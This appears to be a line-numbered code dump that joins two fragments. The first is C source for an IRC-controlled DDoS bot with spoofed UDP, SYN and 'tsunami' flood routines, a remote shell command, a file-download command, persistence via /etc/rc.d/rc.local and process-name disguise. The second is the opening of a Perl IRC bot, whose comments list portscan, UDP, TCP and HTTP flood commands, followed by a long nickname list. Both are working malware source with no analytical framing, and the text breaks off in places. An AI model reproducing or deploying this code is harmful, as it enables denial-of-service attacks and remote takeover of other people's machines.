1) { 293 | Send(sock,"NOTICE %s :ENABLE \n",sender); 294 | Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders"); 295 | return; 296 | } 297 | if (!disabled) { 298 | Send(sock,"NOTICE %s :Already enabled.\n",sender); 299 | return; 300 | } 301 | if (strcasecmp(dispass,argv[1])) { 302 | Send(sock,"NOTICE %s :Wrong password\n",sender); 303 | return; 304 | } 305 | disabled=0; 306 | Send(sock,"NOTICE %s :Password correct.\n",sender); 307 | } 308 | void spoof(int sock, char *sender, int argc, char **argv) { 309 | char ip[256]; 310 | int i, num; 311 | unsigned long uip; 312 | if (argc != 1) { 313 | Send(sock,"NOTICE %s :Removed all spoofs\n",sender); 314 | spoofs=0; 315 | spoofsm=0; 316 | return; 317 | } 318 | if (strlen(argv[1]) > 16) { 319 | Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender); 320 | return; 321 | } 322 | strcpy(ip,argv[1]); 323 | if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0; 324 | for (i=0, num=1;ih_addr, (char *)&i.s_addr, h->h_length); 384 | } 385 | return i.s_addr; 386 | } 387 | void udp(int sock, char *sender, int argc, char **argv) { 388 | unsigned int port,i=0; 389 | unsigned long psize,target,secs; 390 | struct sockaddr_in s_in; 391 | struct iphdr *ip; 392 | struct udphdr *udp; 393 | char buf[1500],*str; 394 | int get; 395 | time_t start=time(NULL); 396 | if (mfork(sender) != 0) return; 397 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); 398 | if (argc < 3) { 399 | Send(sock,"NOTICE %s :UDP \n",sender); 400 | exit(1); 401 | } 402 | target = host2ip(sender,argv[1]); 403 | port = atoi(argv[2]); 404 | secs = atol(argv[3]); 405 | ip=(void*)buf; 406 | udp=(void*)(buf+sizeof(struct iphdr)); 407 | str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr)); 408 | memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr))); 409 | Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]); 410 | ip->ihl = 5; 411 | ip->version = 4; 412 | ip->tos = 0; 413 | ip->tot_len = 1500; 414 | ip->frag_off = 0; 415 | ip->protocol = 17; 416 | ip->ttl = 64; 417 | ip->daddr = target; 418 | udp->len = htons(psize); 419 | s_in.sin_family = AF_INET; 420 | s_in.sin_addr.s_addr = target; 421 | for (;;) { 422 | udp->source = rand(); 423 | if (port) udp->dest = htons(port); 424 | else udp->dest = rand(); 425 | udp->check = in_cksum((u_short *)buf,1500); 426 | ip->saddr = getspoof(); 427 | ip->id = rand(); 428 | ip->check = in_cksum((u_short *)buf,1500); 429 | s_in.sin_port = udp->dest; 430 | sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in)); 431 | if (i >= 50) { 432 | if (time(NULL) >= start+secs) exit(0); 433 | i=0; 434 | } 435 | i++; 436 | } 437 | } 438 | void pan(int sock, char *sender, int argc, char **argv) { 439 | struct send_tcp send_tcp; 440 | struct pseudo_header pseudo_header; 441 | struct sockaddr_in sin; 442 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0; 443 | unsigned int psize=20, source, dest, check; 444 | unsigned long saddr, daddr,secs; 445 | int get; 446 | time_t start=time(NULL); 447 | if (mfork(sender) != 0) return; 448 | if (argc < 3) { 449 | Send(sock,"NOTICE %s :PAN \n",sender); 450 | exit(1); 451 | } 452 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); 453 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];} 454 | daddr=host2ip(sender,argv[1]); 455 | secs=atol(argv[3]); 456 | Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]); 457 | send_tcp.ip.ihl = 5; 458 | send_tcp.ip.version = 4; 459 | send_tcp.ip.tos = 16; 460 | send_tcp.ip.frag_off = 64; 461 | send_tcp.ip.ttl = 64; 462 | send_tcp.ip.protocol = 6; 463 | send_tcp.tcp.ack_seq = 0; 464 | send_tcp.tcp.doff = 10; 465 | send_tcp.tcp.res1 = 0; 466 | send_tcp.tcp.cwr = 0; 467 | send_tcp.tcp.ece = 0; 468 | send_tcp.tcp.urg = 0; 469 | send_tcp.tcp.ack = 0; 470 | send_tcp.tcp.psh = 0; 471 | send_tcp.tcp.rst = 0; 472 | send_tcp.tcp.fin = 0; 473 | send_tcp.tcp.syn = 1; 474 | send_tcp.tcp.window = 30845; 475 | send_tcp.tcp.urg_ptr = 0; 476 | dest=htons(atoi(argv[2])); 477 | while(1) { 478 | source=rand(); 479 | if (atoi(argv[2]) == 0) dest=rand(); 480 | saddr=getspoof(); 481 | send_tcp.ip.tot_len = htons(40+psize); 482 | send_tcp.ip.id = rand(); 483 | send_tcp.ip.saddr = saddr; 484 | send_tcp.ip.daddr = daddr; 485 | send_tcp.ip.check = 0; 486 | send_tcp.tcp.source = source; 487 | send_tcp.tcp.dest = dest; 488 | send_tcp.tcp.seq = rand(); 489 | send_tcp.tcp.check = 0; 490 | sin.sin_family = AF_INET; 491 | sin.sin_port = dest; 492 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 493 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 494 | check = rand(); 495 | send_tcp.buf[9]=((char*)&check)[0]; 496 | send_tcp.buf[10]=((char*)&check)[1]; 497 | send_tcp.buf[11]=((char*)&check)[2]; 498 | send_tcp.buf[12]=((char*)&check)[3]; 499 | pseudo_header.source_address = send_tcp.ip.saddr; 500 | pseudo_header.dest_address = send_tcp.ip.daddr; 501 | pseudo_header.placeholder = 0; 502 | pseudo_header.protocol = IPPROTO_TCP; 503 | pseudo_header.tcp_length = htons(20+psize); 504 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 505 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 506 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); 507 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 508 | if (a >= 50) { 509 | if (time(NULL) >= start+secs) exit(0); 510 | a=0; 511 | } 512 | a++; 513 | } 514 | close(get); 515 | exit(0); 516 | } 517 | void tsunami(int sock, char *sender, int argc, char **argv) { 518 | struct send_tcp send_tcp; 519 | struct pseudo_header pseudo_header; 520 | struct sockaddr_in sin; 521 | unsigned int psize=1400, check,i; 522 | unsigned long saddr, daddr,secs; 523 | int get; 524 | time_t start=time(NULL); 525 | if (mfork(sender) != 0) return; 526 | if (argc < 2) { 527 | Send(sock,"NOTICE %s :TSUNAMI \n",sender); 528 | exit(1); 529 | } 530 | secs=atol(argv[2]); 531 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); 532 | srand(time(NULL) ^ getpid()); 533 | memset(send_tcp.buf,rand(),psize); 534 | daddr=host2ip(sender,argv[1]); 535 | Send(sock,"NOTICE %s :Tsunami heading for %s.\n",sender,argv[1]); 536 | while(1) { 537 | saddr=getspoof(); 538 | send_tcp.ip.ihl = 5; 539 | send_tcp.ip.version = 4; 540 | send_tcp.ip.tos = 16; 541 | send_tcp.ip.tot_len = htons(40+psize); 542 | send_tcp.ip.id = rand(); 543 | send_tcp.ip.frag_off = 64; 544 | send_tcp.ip.ttl = 64; 545 | send_tcp.ip.protocol = 6; 546 | send_tcp.ip.check = 0; 547 | send_tcp.ip.saddr = saddr; 548 | send_tcp.ip.daddr = daddr; 549 | send_tcp.tcp.source = rand(); 550 | send_tcp.tcp.dest = rand(); 551 | send_tcp.tcp.seq = rand(); 552 | send_tcp.tcp.ack_seq = rand(); 553 | send_tcp.tcp.doff = 5; 554 | send_tcp.tcp.res1 = 0; 555 | send_tcp.tcp.cwr = 0; 556 | send_tcp.tcp.ece = 0; 557 | send_tcp.tcp.urg = 0; 558 | send_tcp.tcp.ack = 1; 559 | send_tcp.tcp.psh = 1; 560 | send_tcp.tcp.rst = 0; 561 | send_tcp.tcp.fin = 0; 562 | send_tcp.tcp.syn = 0; 563 | send_tcp.tcp.window = 30845; 564 | send_tcp.tcp.check = 0; 565 | send_tcp.tcp.urg_ptr = 0; 566 | sin.sin_family = AF_INET; 567 | sin.sin_port = send_tcp.tcp.dest; 568 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 569 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 570 | check = in_cksum((unsigned short *)&send_tcp, 40); 571 | pseudo_header.source_address = send_tcp.ip.saddr; 572 | pseudo_header.dest_address = send_tcp.ip.daddr; 573 | pseudo_header.placeholder = 0; 574 | pseudo_header.protocol = IPPROTO_TCP; 575 | pseudo_header.tcp_length = htons(20+psize); 576 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 577 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 578 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); 579 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 580 | if (i >= 50) { 581 | if (time(NULL) >= start+secs) break; 582 | i=0; 583 | } 584 | i++; 585 | } 586 | close(get); 587 | exit(0); 588 | } 589 | void unknown(int sock, char *sender, int argc, char **argv) { 590 | int flag=1,fd,i; 591 | unsigned long secs; 592 | char *buf=(char*)malloc(9216); 593 | struct hostent *hp; 594 | struct sockaddr_in in; 595 | time_t start=time(NULL); 596 | if (mfork(sender) != 0) return; 597 | if (argc < 2) { 598 | Send(sock,"NOTICE %s :UNKNOWN \n",sender); 599 | exit(1); 600 | } 601 | secs=atol(argv[2]); 602 | memset((void*)&in,0,sizeof(struct sockaddr_in)); 603 | in.sin_addr.s_addr=host2ip(sender,argv[1]); 604 | in.sin_family = AF_INET; 605 | Send(sock,"NOTICE %s :Unknowning %s.\n",sender,argv[1]); 606 | while(1) { 607 | in.sin_port = rand(); 608 | if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0); 609 | else { 610 | flag=1; 611 | ioctl(fd,FIONBIO,&flag); 612 | sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in)); 613 | close(fd); 614 | } 615 | if (i >= 50) { 616 | if (time(NULL) >= start+secs) break; 617 | i=0; 618 | } 619 | i++; 620 | } 621 | close(fd); 622 | exit(0); 623 | } 624 | void move(int sock, char *sender, int argc, char **argv) { 625 | if (argc < 1) { 626 | Send(sock,"NOTICE %s :MOVE \n",sender); 627 | exit(1); 628 | } 629 | server=strdup(argv[1]); 630 | changeservers=1; 631 | close(sock); 632 | } 633 | void help(int sock, char *sender, int argc, char **argv) { 634 | if (mfork(sender) != 0) return; 635 | Send(sock,"NOTICE %s :TSUNAMI = Special packeter that wont be blocked by most firewalls\n",sender); sleep(2); 636 | Send(sock,"NOTICE %s :PAN = An advanced syn flooder that will kill most network drivers\n",sender); sleep(2); 637 | Send(sock,"NOTICE %s :UDP = A udp flooder\n",sender); sleep(2); 638 | Send(sock,"NOTICE %s :UNKNOWN = Another non-spoof udp flooder\n",sender); sleep(2); 639 | 640 | Send(sock,"NOTICE %s :NICK = Changes the nick of the client\n",sender); sleep(2); 641 | Send(sock,"NOTICE %s :SERVER = Changes servers\n",sender); sleep(2); 642 | Send(sock,"NOTICE %s :GETSPOOFS = Gets the current spoofing\n",sender); sleep(2); 643 | Send(sock,"NOTICE %s :SPOOFS = Changes spoofing to a subnet\n",sender); sleep(2); 644 | 645 | Send(sock,"NOTICE %s :DISABLE = Disables all packeting from this client\n",sender); sleep(2); 646 | Send(sock,"NOTICE %s :ENABLE = Enables all packeting from this client\n",sender); sleep(2); 647 | 648 | Send(sock,"NOTICE %s :KILL = Kills the client\n",sender); sleep(2); 649 | Send(sock,"NOTICE %s :GET = Downloads a file off the web and saves it onto the hd\n",sender); sleep(2); 650 | Send(sock,"NOTICE %s :VERSION = Requests version of client\n",sender); sleep(2); 651 | Send(sock,"NOTICE %s :KILLALL = Kills all current packeting\n",sender); sleep(2); 652 | Send(sock,"NOTICE %s :HELP = Displays this\n",sender); 653 | 654 | Send(sock,"NOTICE %s :IRC = Sends this command to the server\n",sender); sleep(2); 655 | Send(sock,"NOTICE %s :SH = Executes a command\n",sender); sleep(2); 656 | exit(0); 657 | } 658 | void killall(int sock, char *sender, int argc, char **argv) { 659 | unsigned long i; 660 | for (i=0;i 10) num_params=10; 734 | params[0]=name; 735 | params[num_params+1]="\0"; 736 | m=1; 737 | while (*message != 0) { 738 | message++; 739 | if (m >= num_params) break; 740 | for (i=0;ih_addr, hostm->h_length); 789 | } 790 | ((char*)&spoofs)[3]=((char*)&m)[0]; 791 | ((char*)&spoofs)[2]=((char*)&m)[1]; 792 | ((char*)&spoofs)[1]=((char*)&m)[2]; 793 | ((char*)&spoofs)[0]=0; 794 | spoofsm=256; 795 | } 796 | } 797 | void _433(int sock, char *sender, char *str) { 798 | free(nick); 799 | nick=makestring(); 800 | } 801 | void _NICK(int sock, char *sender, char *str) { 802 | int i; 803 | for (i=0;ih_addr, (char*)&srv.sin_addr, hp->h_length); 838 | } 839 | else srv.sin_addr.s_addr=inet_addr(server); 840 | srv.sin_family = AF_INET; 841 | srv.sin_port = htons(6667); 842 | ioctl(sock,FIONBIO,&flag); 843 | start=time(NULL); 844 | while(time(NULL)-start < 10) { 845 | errno=0; 846 | if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) { 847 | setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0); 848 | setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0); 849 | setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0); 850 | return; 851 | } 852 | if (!(errno == EINPROGRESS ||errno == EALREADY)) break; 853 | sleep(1); 854 | } 855 | server=NULL; 856 | close(sock); 857 | goto start; 858 | } 859 | int main(int argc, char **argv) { 860 | int on,i; 861 | char cwd[256],*str; 862 | FILE *file; 863 | #ifdef STARTUP 864 | str="/etc/rc.d/rc.local"; 865 | file=fopen(str,"r"); 866 | if (file == NULL) { 867 | str="/etc/rc.conf"; 868 | file=fopen(str,"r"); 869 | } 870 | if (file != NULL) { 871 | char outfile[256], buf[1024]; 872 | int i=strlen(argv[0]), d=0; 873 | getcwd(cwd,256); 874 | if (strcmp(cwd,"/")) { 875 | while(argv[0][i] != '/') i--; 876 | sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i); 877 | while(!feof(file)) { 878 | fgets(buf,1024,file); 879 | if (!strcasecmp(buf,outfile)) d++; 880 | } 881 | if (d == 0) { 882 | FILE *out; 883 | fclose(file); 884 | out=fopen(str,"a"); 885 | if (out != NULL) { 886 | fputs(outfile,out); 887 | fclose(out); 888 | } 889 | } 890 | else fclose(file); 891 | } 892 | else fclose(file); 893 | } 894 | #endif 895 | if (fork()) exit(0); 896 | #ifdef FAKENAME 897 | strncpy(argv[0],FAKENAME,strlen(argv[0])); 898 | for (on=1;on 0) { 931 | unsigned int *newpids,on; 932 | for (on=i+1;on 6 | #-Charles-220513- (!bht) (@help) 7 | #-Charles-220513- (!bht) (@portscan) 8 | #-Charles-220513- (!bht) (@udpflood)

9 | #-Charles-220513- (!bht) (@tcpflood) 10 | #-Charles-220513- (!bht) (@httpflood) 11 | #-Charles-220513- (!bht) (@say) 12 | #-Charles-220513- (!bht) (@join) <#> 13 | #-Charles-220513- (!bht) (@part) <#> 14 | #-Charles-220513- (!bht) (@nick) 15 | #-Charles-220513- (!bht) (@msg) <#/nick> 16 | #-Charles-220513- (!bht) (@tsunami) <#/nick> 17 | #-Charles-220513- (!bht) (@op) 18 | #-Charles-220513- (!bht) (@deop) 19 | #-Charles-220513- (!bht) (@voice) 20 | #-Charles-220513- (!bht) (@devoice) 21 | #-Charles-220513- (!bht) (@reset) 22 | #-Charles-220513- (!bht) (@die) 23 | #-Charles-220513- Charles (@back) 24 | #-Charles-220513- Charles (@command² di atas) 25 | #-Charles-220513- <————————————————> 26 | 27 | #use LWP::UserAgent; 28 | 29 | my $linas_max = '5'; 30 | my $sleep = '7'; 31 | my $VERSAO = "2.3.4-1"; 32 | my @nickname = ("Ackerman", 33 | "Adams", 34 | "Addison", 35 | "Adelstein", 36 | "Adibe", 37 | "Adorno", 38 | "Ahlers", 39 | "Alavi", 40 | "Alcorn", 41 | "Alda", 42 | "Aleks", 43 | "Allison", 44 | "Alongi", 45 | "Altavilla", 46 | "Altenberger", 47 | "Altenhofen", 48 | "Amaral", 49 | "Amatangelo", 50 | "Ameer", 51 | "Amsden", 52 | "Anand", 53 | "Andel", 54 | "Ando", 55 | "Andrelus", 56 | "Andron", 57 | "Anfinrud", 58 | "Ansley", 59 | "Anthony", 60 | "Antos", 61 | "Arbia", 62 | "Arduini", 63 | "Arellano", 64 | "Aristotle", 65 | "Arjas", 66 | "Arky", 67 | "Atkins", 68 | "Augustus", 69 | "Aurelius", 70 | "Axelrod", 71 | "Axworthy", 72 | "Ayiemba", 73 | "Aykroyd", 74 | "Ayling", 75 | "Azima", 76 | "Bachmuth", 77 | "Backus", 78 | "Bady", 79 | "Baglivo", 80 | "Bagnold", 81 | "Bailar", 82 | "Bakanowsky", 83 | "Baleja", 84 | "Ballatori", 85 | "Ballew", 86 | "Baltz", 87 | "Banta", 88 | "Barabesi", 89 | "Barajas", 90 | "Baranczak", 91 | "Baranowska", 92 | "Barberi", 93 | "Barbetti", 94 | "Barneson", 95 | "Barnett", 96 | "Barriola", 97 | "Barry", 98 | "Bartholomew", 99 | "Bartolome", 100 | "Bartoo", 101 | "Basavappa", 102 | "Bashevis", 103 | "Batchelder", 104 | "Baumiller", 105 | "Bayles", 106 | "Bayo", 107 | "Beacon", 108 | "Beal", 109 | "Bean", 110 | "Beckman", 111 | "Beder", 112 | "Bedford", 113 | "Behenna", 114 | "Belanger", 115 | "Belaoussof", 116 | "Belfer", 117 | "Belin-Collart", 118 | "Bellavance", 119 | "Bellhouse", 120 | "Bellini", 121 | "Belloc", 122 | "Benedict-Dye", 123 | "Bergson", 124 | "Berke-Jenkins", 125 | "Bernardo", 126 | "Bernassola", 127 | "Bernston", 128 | "Berrizbeitia", 129 | "Betti", 130 | "Beynart", 131 | "Biagioli", 132 | "Bickel", 133 | "Binion", 134 | "Bir", 135 | "Bisema", 136 | "Bisho", 137 | "Blackbourn", 138 | "Blackwell", 139 | "Blagg", 140 | "Blakemore", 141 | "Blanke", 142 | "Bliss", 143 | "Blizard", 144 | "Bloch", 145 | "Bloembergen", 146 | "Bloemhof", 147 | "Bloxham", 148 | "Blyth", 149 | "Bolger", 150 | "Bolick", 151 | "Bollinger", 152 | "Bologna", 153 | "Boner", 154 | "Bonham", 155 | "Boniface", 156 | "Bontempo", 157 | "Book", 158 | "Bookbinder", 159 | "Boone", 160 | "Boorstin", 161 | "Borack", 162 | "Borden", 163 | "Bossi", 164 | "Bothman", 165 | "Botosh", 166 | "Boudin", 167 | "Boudrot", 168 | "Bourneuf", 169 | "Bowers", 170 | "Boxer", 171 | "Boyajian", 172 | "Boyes", 173 | "Boyland", 174 | "Boym", 175 | "Boyne", 176 | "Bracalente", 177 | "Bradac", 178 | "Bradach", 179 | "Brecht", 180 | "Breed", 181 | "Brenan", 182 | "Brennan", 183 | "Brewer", 184 | "Brewer", 185 | "Bridgeman", 186 | "Bridges", 187 | "Brinton", 188 | "Britz", 189 | "Broca", 190 | "Brook", 191 | "Brzycki", 192 | "Buchan", 193 | "Budding", 194 | "Bullard", 195 | "Bunton", 196 | "Burden", 197 | "Burdzy", 198 | "Burke", 199 | "Burridge", 200 | "Busetta", 201 | "Byatt", 202 | "Byerly", 203 | "Byrd", 204 | "Cage", 205 | "Calnan", 206 | "Cammelli", 207 | "Cammilleri", 208 | "Canley", 209 | "Capanni", 210 | "Caperton", 211 | "Capocaccia", 212 | "Capodilupo", 213 | "Cappuccio", 214 | "Capursi", 215 | "Caratozzolo", 216 | "Carayannopoulos", 217 | "Carlin", 218 | "Carlos", 219 | "Carlyle", 220 | "Carmichael", 221 | "Caroti", 222 | "Carper", 223 | "Cartmill", 224 | "Cascio", 225 | "Case", 226 | "Caspar", 227 | "Castelda", 228 | "Cavanagh", 229 | "Cavell", 230 | "Ceniceros", 231 | "Cerioli", 232 | "Chapman", 233 | "Charles", 234 | "Cheang", 235 | "Cherry", 236 | "Chervinsky", 237 | "Chiassino", 238 | "Chien", 239 | "Childress", 240 | "Childs", 241 | "Chinipardaz", 242 | "Chinman", 243 | "Christenson", 244 | "Christian", 245 | "Christiano", 246 | "Christie", 247 | "Christopher", 248 | "Chu", 249 | "Chupasko", 250 | "Church", 251 | "Ciampaglia", 252 | "Cicero", 253 | "Cifarelli", 254 | "Claffey", 255 | "Clancy", 256 | "Clark", 257 | "Clement", 258 | "Clifton", 259 | "Clow", 260 | "Coblenz", 261 | "Coito", 262 | "Coldren", 263 | "Colella", 264 | "Collard", 265 | "Collis", 266 | "Compton", 267 | "Compton", 268 | "Comstock", 269 | "Concino", 270 | "Condodina", 271 | "Connors", 272 | "Corey", 273 | "Cornish", 274 | "Cosmides", 275 | "Counter", 276 | "Coutaux", 277 | "Crawford", 278 | "Crocker", 279 | "Croshaw", 280 | "Croxen", 281 | "Croxton", 282 | "Cui", 283 | "Currier", 284 | "Cutler", 285 | "Cvek", 286 | "Cyders", 287 | "daSilva", 288 | "Daldalian", 289 | "Daly", 290 | "D'Ambra", 291 | "Danieli", 292 | "Dante", 293 | "Dapice", 294 | "D'arcangelo", 295 | "Das", 296 | "Dasgupta", 297 | "Daskalu", 298 | "David", 299 | "Dawkins", 300 | "DeGennaro", 301 | "DeLaPena", 302 | "del'Enclos", 303 | "deRousse", 304 | "Debroff", 305 | "Dees", 306 | "Defeciani", 307 | "Delattre", 308 | "Deleon-Rendon", 309 | "Delger", 310 | "Dell'acqua", 311 | "Deming", 312 | "Dempster", 313 | "Demusz", 314 | "Denault", 315 | "Denham", 316 | "Denison", 317 | "Desombre", 318 | "Deutsch", 319 | "D'fini", 320 | "Dicks", 321 | "Diefenbach", 322 | "Difabio", 323 | "Difronzo", 324 | "Dilworth", 325 | "Dionysius", 326 | "Dirksen", 327 | "Dockery", 328 | "Doherty", 329 | "Donahue", 330 | "Donner", 331 | "Doonan", 332 | "Dore", 333 | "Dorf", 334 | "Dosi", 335 | "Doty", 336 | "Doug", 337 | "Dowsland", 338 | "Drinker", 339 | "D'souza", 340 | "Duffin", 341 | "Durrett", 342 | "Dussault", 343 | "Dwyer", 344 | "Eardley", 345 | "Ebeling", 346 | "Eckel", 347 | "Edley", 348 | "Edner", 349 | "Edward", 350 | "Eickenhorst", 351 | "Eliasson", 352 | "Elmendorf", 353 | "Elmerick", 354 | "Elvis", 355 | "Encinas", 356 | "Enyeart", 357 | "Eppling", 358 | "Erbach", 359 | "Erdman", 360 | "Erdos", 361 | "Erez", 362 | "Espinoza", 363 | "Estes", 364 | "Etter", 365 | "Euripides", 366 | "Everett", 367 | "Fabbris", 368 | "Fagan", 369 | "Faioes", 370 | "Falco-Acosta", 371 | "Falorsi", 372 | "Faris", 373 | "Farone", 374 | "Farren", 375 | "Fasso'", 376 | "Fates", 377 | "Feigenbaum", 378 | "Fejzo", 379 | "Feldman", 380 | "Fernald", 381 | "Fernandes", 382 | "Ferrante", 383 | "Ferriell", 384 | "Feuer", 385 | "Fido", 386 | "Field", 387 | "Fink", 388 | "Finkelstein", 389 | "Finnegan", 390 | "Fiorina", 391 | "Fisk", 392 | "Fitzmaurice", 393 | "Flier", 394 | "Flores", 395 | "Folks", 396 | "Forester", 397 | "Fortes", 398 | "Fortier", 399 | "Fossey", 400 | "Fossi", 401 | "Francisco", 402 | "Franklin-Kenea", 403 | "Franz", 404 | "Frazier-Davis", 405 | "Freid", 406 | "Freundlich", 407 | "Fried", 408 | "Friedland", 409 | "Frisken", 410 | "Frowiss", 411 | "Fryberger", 412 | "Frye", 413 | "Fujii-Abe", 414 | "Fuller", 415 | "Furth", 416 | "Fusaro", 417 | "Gabrielli", 418 | "Gaggiotti", 419 | "Galeotti", 420 | "Galwey", 421 | "Gambini", 422 | "Garfield", 423 | "Garman", 424 | "Garonna", 425 | "Geller", 426 | "Gemberling", 427 | "Georgi", 428 | "Gerrett", 429 | "Ghorai", 430 | "Gibbens", 431 | "Gibson", 432 | "Gilbert", 433 | "Gili", 434 | "Gill", 435 | "Gillispie", 436 | "Gist", 437 | "Gleason", 438 | "Glegg", 439 | "Glendon", 440 | "Goldfarb", 441 | "Goncalves", 442 | "Good", 443 | "Goodearl", 444 | "Goody", 445 | "Gozzi", 446 | "Gravell", 447 | "Greenberg", 448 | "Greenfeld", 449 | "Griffiths", 450 | "Grigoletto", 451 | "Grummell", 452 | "Gruner", 453 | "Gruppe", 454 | "Guenthart", 455 | "Gunn", 456 | "Guo", 457 | "Ha", 458 | "Haar", 459 | "Hackman", 460 | "Hackshaw", 461 | "Haley", 462 | "Halkias", 463 | "Hallowell", 464 | "Halpert", 465 | "Hambarzumjan", 466 | "Hamer", 467 | "Hammerness", 468 | "Hand", 469 | "Hanssen", 470 | "Harding", 471 | "Hargraves", 472 | "Harlow", 473 | "Harrigan", 474 | "Hartman", 475 | "Hartmann", 476 | "Hartnett", 477 | "Harwell", 478 | "Haviaras", 479 | "Hawkes", 480 | "Hayes", 481 | "Haynes", 482 | "Hazlewood", 483 | "Heermans", 484 | "Heft", 485 | "Heiland", 486 | "Hellman", 487 | "Hellmiss", 488 | "Helprin", 489 | "Hemphill", 490 | "Henery", 491 | "Henrichs", 492 | "Hernandez", 493 | "Herrera", 494 | "Hester", 495 | "Heubert", 496 | "Heyeck", 497 | "Himmelfarb", 498 | "Hind", 499 | "Hirst", 500 | "Hitchcock", 501 | "Hoang", 502 | "Hock", 503 | "Hoffer", 504 | "Hoffman", 505 | "Hokanson", 506 | "Hokoda", 507 | "Holmes", 508 | "Holoien", 509 | "Holter", 510 | "Holway", 511 | "Holzman", 512 | "Hooker", 513 | "Hopkins", 514 | "Horsley", 515 | "Hoshida", 516 | "Hostage", 517 | "Hottle", 518 | "Howard", 519 | "Hoy", 520 | "Huey", 521 | "Huidekoper", 522 | "Hungerford", 523 | "Huntington", 524 | "Hupp", 525 | "Hurtubise", 526 | "Hutchings", 527 | "Hyde", 528 | "Iaquinta", 529 | "Ichikawa", 530 | "Igarashi", 531 | "Inamura", 532 | "Inniss", 533 | "Isaac", 534 | "Isaievych", 535 | "Isbill", 536 | "Isserman", 537 | "Iyer", 538 | "Jacenko", 539 | "Jackson", 540 | "Jagers", 541 | "Jagger", 542 | "Jagoe", 543 | "Jain", 544 | "Jamil", 545 | "Janjigian", 546 | "Jarnagin", 547 | "Jarrell", 548 | "Jay", 549 | "Jeffers", 550 | "Jellis", 551 | "Jenkins", 552 | "Jespersen", 553 | "Jewett", 554 | "Johannesson", 555 | "Johannsen", 556 | "Johns", 557 | "Jolly", 558 | "Jorgensen", 559 | "Jucks", 560 | "Juliano", 561 | "Julious", 562 | "Kabbash", 563 | "Kaboolian", 564 | "Kafadar", 565 | "Kalbfleisch", 566 | "Kaligian", 567 | "Kalil", 568 | "Kalinowski", 569 | "Kalman", 570 | "Kamel", 571 | "Kangis", 572 | "Karpouzes", 573 | "Kassower", 574 | "Kasten", 575 | "Kawachi", 576 | "Kee", 577 | "Keenan", 578 | "Keepper", 579 | "Keith", 580 | "Kelker", 581 | "Kelsey", 582 | "Kempton", 583 | "Kemsley", 584 | "Kendall", 585 | "Kerry", 586 | "Keul", 587 | "Khong", 588 | "Kimmel", 589 | "Kimmett", 590 | "Kimura", 591 | "Kindall", 592 | "Kinsley", 593 | "Kippenberger", 594 | "Kirscht", 595 | "Kittridge", 596 | "Kleckner", 597 | "Kleiman", 598 | "Kleinfelder", 599 | "Klemperer", 600 | "Kling", 601 | "Klinkenborg", 602 | "Klint", 603 | "Knuff", 604 | "Kobrick", 605 | "Koch", 606 | "Kohn", 607 | "Koivumaki", 608 | "Kommer", 609 | "Koniaris", 610 | "Konrad", 611 | "Kool", 612 | "Korzybski", 613 | "Kotter", 614 | "Kovaks", 615 | "Kraemer", 616 | "Krailo", 617 | "Krasney", 618 | "Kraus", 619 | "Kroemer", 620 | "Krysiak", 621 | "Kuenzli", 622 | "Kumar", 623 | "Kusman", 624 | "Kuwabara", 625 | "La", 626 | "Labunka", 627 | "Lafler", 628 | "Laing", 629 | "Lallemant", 630 | "Landes", 631 | "Lankes", 632 | "Lantieri", 633 | "Lanzit", 634 | "Laserna", 635 | "Lashley", 636 | "Lawless", 637 | "Lecar", 638 | "Lecce", 639 | "Leclercq", 640 | "Leite", 641 | "Lenard", 642 | "l'Enclos", 643 | "Lesser", 644 | "Lessi", 645 | "Liakos", 646 | "Lidano", 647 | "Liem", 648 | "Light", 649 | "Lightfoot", 650 | "Lim", 651 | "Linares", 652 | "Linda", 653 | "Linder", 654 | "Line", 655 | "Linehan", 656 | "Linzee", 657 | "Lippmann", 658 | "Lipponen", 659 | "Little", 660 | "Litvak", 661 | "Livernash", 662 | "Livi", 663 | "Livolsi", 664 | "Lizardo", 665 | "Locatelli", 666 | "Longworth", 667 | "Loss", 668 | "Loveman", 669 | "Lowenstein", 670 | "Loza", 671 | "Lubin", 672 | "Lucas", 673 | "Luciano", 674 | "Luczkow", 675 | "Luecke", 676 | "Lunetta", 677 | "Luoma", 678 | "Lussier", 679 | "Lutcavage", 680 | "Luzader", 681 | "Ma", 682 | "Maccormac", 683 | "Macdonald", 684 | "Maceachern", 685 | "Macintyre", 686 | "Mackenney", 687 | "MacMillan", 688 | "Macy", 689 | 